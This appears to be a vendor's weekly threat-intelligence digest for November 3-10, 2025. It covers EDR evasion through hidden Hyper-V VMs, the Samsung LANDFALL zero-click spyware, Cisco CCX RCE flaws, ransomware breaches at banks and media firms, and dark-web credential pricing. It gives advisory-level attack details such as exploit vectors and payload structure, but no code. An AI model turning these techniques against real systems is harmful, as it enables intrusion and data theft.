Home 
The week of November 3-10, 2025, witnessed extraordinary escalation in threat sophistication, ransomware coordination, and supply chain compromise targeting financial institutions and enterprise infrastructure globally. This report documents four major financial sector breaches, five critical zero-day exploitation chains, next-generation EDR evasion techniques, and unprecedented darkweb credential trafficking affecting billions of users.
>>Outpace Attackers With AI-Based Automated Penetration Testing
NEW HACKING TECHNIQUES
1. Hyper-V Virtualization Abuse for EDR Evasion
Threat Actor: Curly COMrades (Russia-aligned)
Campaign Date: July 2025 | Disclosure: November 3-7, 2025
Attackers bypassed endpoint security by creating hidden Alpine Linux virtual machines within compromised Windows systems using Microsoft Hyper-V. The 120MB lightweight VM hosted custom reverse shells (CurlyShell) and reverse proxies (CurlCat) completely outside host OS visibility. All malicious traffic was NAT-translated through the legitimate host IP, achieving perfect stealth. This represents a fundamental shift: threat actors are evolving from engaging EDR to evading it entirely through architectural isolation. Researchers documented that as EDR becomes commodity security, sophisticated actors abuse legitimate system features that security tools cannot inspect.
2. VS Code Extension Ransomware with GitHub C2
Malware: susvsex extension
Discovery: November 5, 2025
Researchers identified “vibe-coded” ransomware (AI-assisted malware) with embedded encryption capabilities and GitHub-based command-and-control using exposed API tokens. The extension demonstrated security anti-patterns: visible functionality, plaintext credentials, test directories-indicating how AI-assisted malware democratizes ransomware development while introducing operational security gaps attackers can exploit.
CRITICAL CVEs & ATTACK TECHNIQUES
1. Samsung LANDFALL Spyware – Commercial-Grade Zero-Click Exploitation
CVE: CVE-2025-21042 (CVSS 8.8)
Incident: Pre-April 2025 | Disclosure: November 6, 2025
Threat Actor: CL-UNK-1054 (Middle East commercial spyware operation)
Unit 42 researchers uncovered LANDFALL, sophisticated Android spyware engineered specifically for Samsung Galaxy devices. The attack exploited a zero-day in Samsung’s image processing library to achieve zero-click remote code execution via WhatsApp image files. Attackers embedded two ELF binaries (loader + SELinux policy manipulator) within malformed DNG image files, triggering memory corruption during image decoding. The spyware collected microphone recordings, GPS locations, photos, contacts, and call logs. Campaign remained undetected for months (July 2024 through April 2025 patch), suggesting advanced PSOA (private-sector offensive actor) involvement.
Technical Details:
- Attack vector: Malformed DNG image file sent via WhatsApp
- Trigger: Image preview initiates vulnerable decoding process
- Payload 1 (b.so): 106KB ARM64 ELF backdoor for comprehensive surveillance
- Payload 2 (l.so): XZ-compressed binary manipulating SELinux policy for privilege escalation
- Persistence: Survives reboots through system-level integration
2. Cisco Unified CCX – Dual Critical RCE Vulnerabilities
CVEs: CVE-2025-20354 & CVE-2025-20358
CVSS: 9.8 (Base)
Disclosure: November 5, 2025
Cisco disclosed two critical flaws in contact center software affecting small/medium deployments. CVE-2025-20354 (Java RMI RCE): attackers upload crafted files through Java RMI interface, executing arbitrary commands as root. CVE-2025-20358 (CCX Editor Auth Bypass): attackers redirect authentication to malicious servers, tricking the client into accepting forged tokens, then executing arbitrary scripts as internal users. No workarounds exist; patching is mandatory.
FINANCIAL SECTOR BREACHES
BREACH 1: Habib Bank AG Zurich – 2.5TB Data Exfiltration
Date: November 5, 2025 (Disclosure)
Attacker: Qilin Ransomware Gang
Data: 2.5TB (2 million files)
Victims: Global bank operating across Switzerland, UK, UAE, Hong Kong, Kenya, South Africa, Canada
Overview:
Qilin claimed responsibility for stealing 2.5 terabytes from Habib Bank, exposing passport numbers, account balances, transaction histories, internal banking tool source code, and KYC documentation. Screenshots confirmed breach authenticity.
Explanation:
Attackers likely compromised credentials or exploited unpatched remote access vulnerabilities, maintaining presence for 1-2 months to accumulate 2.5TB data. The source code exposure enables future vulnerability research targeting banking infrastructure. Transaction location data (revealing spending patterns) poses existential risk to high-net-worth customers.
Impact/Risk:
- Immediate: 2+ million customers exposed to identity theft, SIM swapping, wire fraud
- Banking System: Stolen source code enables targeted re-exploitation; infrastructure intelligence reveals security architecture
- Regulatory: GDPR/FINMA violations carrying €20M+ penalties
- Ecosystem: Data monetization through criminal syndicates; credential stuffing against other financial institutions
CISO Takeaway: Qilin’s alliance with LockBit and DragonForce (forming ransomware super-group) positions banking sector as premium target. Assume 30-90 day compromise dwell time before detection-preventive access controls and segmentation are critical.
BREACH 2: Nikkei Inc. – Infostealer-to-Slack Compromise
Date: August 2025 (Infection) | November 4, 2025 (Disclosure)
Victims: 17,368 employees and business partners
Data: Slack chat histories, developer channel content, internal communications
Explanation:
Employee’s personal computer infected with infostealer malware extracting Slack session tokens from browser storage. Attacker authenticated using tokens, accessing developer channels containing code snippets, API keys, project timelines, and strategic communications. Detection occurred September 2025; formal disclosure November 2025.
Impact: News organization’s confidential editorial strategy, source information, and internal deliberations exposed to competitors and threat actors. Hudson Rock research shows 270,000+ Slack credentials harvested globally through infostealers.
BREACH 3: Askul Corporation – RansomHouse Extortion
Date: October 19, 2025 (Discovery) | November 4-7, 2025 (Formal Disclosure)
Attacker: RansomHouse (Extortion-only group)
Data: 1.1TB (1.1 million files)
Affected Companies: Askul, Muji/Ryohin Keikaku, Loft (major Japanese retailers)
Explanation:
RansomHouse employed extortion-only methodology-silently exfiltrating data for 2-4 weeks while maintaining system functionality, avoiding immediate detection. Publicly disclosed breach October 30; company confirmed November 4. Data included customer names, purchase histories, payment information, supplier contracts, and employee records.
Impact: Multi-week retail disruption; millions of customers exposed; secondary victims (Muji, Loft) experienced supply chain cascades. Demonstrates RansomHouse’s operational sophistication and negotiation leverage through reputation risk rather than encryption-based disruption.
BREACH 4: Washington Post – Oracle E-Business Suite Campaign
Date: November 6-7, 2025 (Disclosure)
Attacker: Clop Ransomware Gang
Victims: 100+ organizations globally
Vector: CVE-2025-61882 (CVSS 9.8) – Unauthenticated RCE in Oracle EBS
Explanation:
Clop exploited CVE-2025-61882 for unauthenticated remote code execution in widely-deployed Oracle EBS systems. Attackers executed reconnaissance, database queries, and data exfiltration across 100+ victims globally. Washington Post acknowledged compromise; Clop demanded ransom ($50M+ for some victims). Oracle issued patches; CISA directed federal agencies to patch by specific deadline.
Impact: EBS systems manage HR, payroll, supply chain, and financials for Fortune 500 companies and government agencies. Single vulnerability enabling 100+ simultaneous attacks demonstrates supply chain risk concentration.
DARKWEB CHATTER & THREAT ACTOR COORDINATION
Ransomware Ecosystem Status
- LockBit/Qilin/DragonForce Alliance: Announced October 2025; operational coordination November 2025; estimated 1,000+ attacks monthly
- Credential Trafficking: 10 billion plaintext passwords posted free November 5, 2025; government email accounts selling for $40 each
- RansomHouse Operations: 124+ claimed attacks; professional mediator positioning; 60%+ victim payment rate
- Zero-Day Trading: CVE-2025-59287 (WSUS RCE) actively traded; PoC available; 2,500-6,000 exposed targets
Underground Forum Intelligence
- Initial Access Brokers: Selling network access at $500-$50K; 5-10 new offerings daily; 70% purchased by ransomware gangs
- Law Enforcement Compromises: Active .gov/.police email accounts available for $40-500; threat actors demonstrating access to law enforcement databases
- Exploit Framework Sharing: CVE-2025-11371 (Gladinet LFI) exploitation framework publicly shared; CVE-2025-48703 (CWP) mass exploitation underway
- Commercial Spyware: LANDFALL infrastructure suggests PSOA or state-aligned involvement; WhatsApp zero-click exploits advertised as premium offering
Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
